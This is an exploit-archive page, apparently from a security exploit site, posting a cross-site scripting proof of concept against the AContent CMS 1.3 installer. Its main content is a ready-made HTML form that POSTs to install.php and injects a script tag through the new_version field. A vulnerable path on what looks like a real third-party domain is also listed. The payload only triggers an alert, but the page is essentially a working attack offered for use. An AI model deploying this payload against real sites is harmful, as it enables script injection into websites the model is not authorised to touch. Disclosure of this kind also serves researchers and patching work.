Home / os / winxp

AContent Content Management System Cross Site Scripting

Posted on 30 November -0001

<HTML><HEAD><TITLE>AContent Content Management System Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |=============================================================| |[+] Exploit Title: Cross Site Scripting in AContent Content Management System |[+] |[+] Exploit Author: Ashiyane Digital Security Team |[+] |[+] Download Link : https://sourceforge.net/projects/acontent/files/AContent-1.3.tar.gz/download |[+] Version : 1.3 |[+] |[+] Vendor : http://www.atutor.ca/acontent/ |[+] |[+] Tested on: Kali Linux |[+] |[+] Date: 12 /29 / 2016 |=============================================================| |[+] Vuln Path : http://www.site.go.th/AContent/install/install.php |[+] Method : POST |=============================================================| |[+] Exploit Code: <form action="127.0.0.1/5/AContent/install/install.php" method="post" name="form"> <input type="hidden" name="action" value="process" /> <input type="hidden" name="step" value="1" /> <input type="hidden" name="new_version" value="1.3'"/><ScRiPt >alert(123)</ScRiPt>" /> <input type="submit" name="submit" class="button" value="I Agree" /> <input type="submit" name="submit" class="button" value="I Disagree" /><br /> </form> |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : M.R.S.L.Y |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| </BODY></HTML>

 

TOP